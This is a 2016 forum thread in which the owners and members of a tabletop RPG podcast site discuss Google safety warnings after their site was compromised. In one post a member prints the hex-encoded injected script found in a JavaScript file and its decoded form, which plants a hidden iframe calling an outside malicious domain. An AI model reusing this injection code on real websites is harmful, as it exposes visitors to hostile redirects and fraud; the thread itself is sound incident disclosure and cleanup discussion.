Jump to content

  • Log in with Facebook Log in with Twitter Log In with Google      Sign In   
  • Create Account
DriveThruRPG.com
Photo

Site Alerts


  • Please log in to reply
74 replies to this topic

#1 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 02 February 2016 - 10:56 AM

Hey there

 

Some of you may be seeing some alerts regarding the safety of the site. We are good - we managed to pick up some Chinese redirect code briefly but we have removed it and are in the process of getting Google to verify that it is gone so the nasty screen will go away...

 

Cheers

Hal :hal:


  • 1

#2 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 04 February 2016 - 08:02 AM

And we are clean and shiny once more so the red screen of terror should be vanishing in 3, 2, 1...

 

Thanks Google!

 

Hal :hal:


  • 1

#3 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 04 February 2016 - 01:53 PM

Woot woot!

 

Glad to hear it was just redirect code and such. For a while I figured someone had been listening to the podcasts and was trying to keep such filth, I mean quality entertainment from reaching the public.


  • 0

#4 BigJackBrass

BigJackBrass

    Whartson Hall Gamer

  • Administrators
  • 4,601 posts
  • Amazon Wishlist
  • LocationStalybridge

Posted 04 February 2016 - 03:23 PM

For a while I figured someone had been listening to the podcasts and was trying to keep such filth, I mean quality entertainment from reaching the public.


Nah, that's just Hal falling behind with the releases again ;)
  • 0

#5 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 08 February 2016 - 10:31 PM

And now.... I am having issues getting files from the The Vault to the site... Goddamit....... we are working on it so expect a massive release of all kinds of ear joy as soon as we figure out what is going on.... I know @Cob37 will be happy when we get his resolve - the Skell guys have a bunch of stuff waiting to release along with Whartson Hall and a few other folks including our good selves :D Hal :hal:
  • 1

#6 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 09 February 2016 - 06:41 AM

Yay! I wish you luck in getting the issue fixed. I've had to listen to MUSIC at work lately! The horror!

Actually I've been listening to the old Kingmaker campaign but I have missed the newer stuff.
  • 0

#7 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 09 February 2016 - 07:33 AM

This issue is separate from the red screen of terror we think but may have been caused by fixing that :)

 

I have a ticket in with the CMS folks to see if they can help us out...

 

Hal :hal:


  • 0

#8 thad

thad

    Player Subordinaire

  • Members
  • 383 posts
  • LocationNew Zealand

Posted 09 February 2016 - 11:52 AM

And red screen is back! (for me just now at least)


  • 0

#9 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 09 February 2016 - 12:13 PM

Same here :(
  • 0

#10 kendoyle659

kendoyle659

    RPGMP3 Patron

  • Patrons
  • 440 posts
  • LocationYork

Posted 09 February 2016 - 02:28 PM

I've got it too I'm afraid


  • 0

#11 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 10 February 2016 - 03:52 PM

Grrrrrrrr - its a different check that Google is running now it seems... Pfft

 

(pokes the code)

 

Google is going to kill small sites if they carry on like this...

 

Hal :hal:


  • 0

#12 JamieMcCrimmon

JamieMcCrimmon

    Raven

  • Patrons
  • 44 posts

Posted 14 February 2016 - 06:55 AM

I don't think you guys are out of the woods yet. Now, this MAY be legitimate advertiser code, but I very much doubt it. RequestPolicy (a Firefox addon I use) detected an attempt by the homepage to connect to "sinyayamorda.info". I googled this domain and found that it had been registered yesterday and that there was very little publically available information about it.I used the Web Developer addon to probe further, and found a suspicious looking block of code at the end of http://www.rpgmp3.co...cks/compiled.js which decoded this great long chunk of hex:

"77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822373466366138633434656131643335633935386564616437373830623836366122293b69662820783333647120213d2022303233383238393836333832623866613532646166303638336462323663643022297b783232627128223734663661386334346561316433356339353865646164373738306238363661222c223032333832383938363338326238666135326461663036383364623236636430222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f6373732e73696e796179616d6f7264612e696e666f2f6d656761616476657274697a652f3f4e4c5470644255503d777270755671465526544a557657564f4f44617564504657415155693d49555a6f467155754e4b4226705a754f5a6c5673794447796c3d65574a4e6d45747a525a555a41675772266d68476c704b72773d65507a777341426162737a264c6a66414c7643766d533d664a646470664e5a4173496726654b436a495379494573616a59576c72643d59727651416b4676734f4a2652774d4a62516b4c643d4e734d5052666d614f64626f59496a4c75586426416e445163774f5a61613d73754d646b6f6878492657776852496557476e61453d546c6f6861584674795a56646f26436146574b6a6d6746523d686244624a674a6f266b6579776f72643d3234636239666634333839376263316638643066366330373761613131363931223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d"

into (I wrote a short C++ script to do the decode)
window.onload = function(){function x22bq(a,b,c){if(c){var d = new Date();d.setDate(d.getDate()+c);}if(a && b) document.cookie = a+'='+b+(c ? '; expires='+d.toUTCString() : '');else return false;}function x33bq(a){var b = new RegExp(a+'=([^;]){1,}');var c = b.exec(document.cookie);if(c) c = c[0].split('=');else return false;return c[1] ? c[1] : false;}var x33dq = x33bq("74f6a8c44ea1d35c958edad7780b866a");if( x33dq != "023828986382b8fa52daf0683db26cd0"){x22bq("74f6a8c44ea1d35c958edad7780b866a","023828986382b8fa52daf0683db26cd0",1);var x22dq = document.createElement("div");var x22qq = "[url="http://css.sinyayamorda.info/megaadvertize/?NLTpdBUP=wrpuVqFU&TJUvWVOODaudPFWAQUi=IUZoFqUuNKB&pZuOZlVsyDGyl=eWJNmEtzRZUZAgWr&mhGlpKrw=ePzwsABabsz&LjfALvCvmS=fJddpfNZAsIg&eKCjISyIEsajYWlrd=YrvQAkFvsOJ&RwMJbQkLd=NsMPRfmaOdboYIjLuXd&AnDQcwOZaa=suMdkohxI&WwhRIeWGnaE=TlohaXFtyZVdo&CaFWKjmgFR=hbDbJgJo&keyword=24cb9ff43897bc1f8d0f6c077aa11691"]http://css.sinyayamorda.info/megaadvertize/?NLTpdBUP=wrpuVqFU&TJUvWVOODaudPFWAQUi=IUZoFqUuNKB&pZuOZlVsyDGyl=eWJNmEtzRZUZAgWr&mhGlpKrw=ePzwsABabsz&LjfALvCvmS=fJddpfNZAsIg&eKCjISyIEsajYWlrd=YrvQAkFvsOJ&RwMJbQkLd=NsMPRfmaOdboYIjLuXd&AnDQcwOZaa=suMdkohxI&WwhRIeWGnaE=TlohaXFtyZVdo&CaFWKjmgFR=hbDbJgJo&keyword=24cb9ff43897bc1f8d0f6c077aa11691";x22dq.innerHTML="[/url]";document.body.appendChild(x22dq);}}
This looks very suspicious, and I think you guys really are getting hacked and Google is right to flag the current state of the site as suspicious.

EDIT: Definitely a hack - see https://productforum...ers/g_haABTaDXg for someone else who got hit by the same thing. Looks like the hack generates different .info domains for different hacked sites.
  • 0

#13 Thing

Thing

    a Bad Man

  • Administrators
  • 12,601 posts
  • LocationNear Seattle, WA, USA

Posted 14 February 2016 - 05:14 PM

Yeah, it looks like a bot is adding the ad code to some of our JavaScript files and putting it back as I remove it.

I'm tracking down the exploits being used and will be disabling them shortly and start another cleaning. I would block the attackers up a, but it looks like a distributed attack through several sites in China, Russia, Tajikistan, and a couple other countries and will personally shift around more.

Luckily it looks like they are mostly just trying to show ads and get some hits for other sites. I haven't seen anything truly malicious yet.

I'll post more when I'm a bit ahead of this
  • 0

#14 Hafwit 2.0

Hafwit 2.0

    Goblin

  • Members
  • 161 posts
  • LocationSvendborg, Denmark

Posted 19 February 2016 - 07:35 AM

It seems to have stopped?
  • 0

#15 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 19 February 2016 - 08:10 AM

No more site herpes?
  • 0

#16 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 19 February 2016 - 08:10 AM

No more site herpes?
  • 0

#17 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 19 February 2016 - 08:12 AM

We are hopeful :) We might be getting back to normal (fingers crossed) We have performed some hardening of the security on the server as well as some things on the site so let us know if you see anything hokey happening :) Hal :hal:
  • 0

#18 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 19 February 2016 - 08:13 AM

We are hopeful :) We might be getting back to normal (fingers crossed) We have performed some hardening of the security on the server as well as some things on the site so let us know if you see anything hokey happening :) Hal :hal:
  • 0

#19 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 19 February 2016 - 04:47 PM

Other than the double posts? :)
  • 0

#20 Hafwit 2.0

Hafwit 2.0

    Goblin

  • Members
  • 161 posts
  • LocationSvendborg, Denmark

Posted 20 February 2016 - 03:45 PM

Other than the double posts? :)
  • 0




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Gravityscan Badge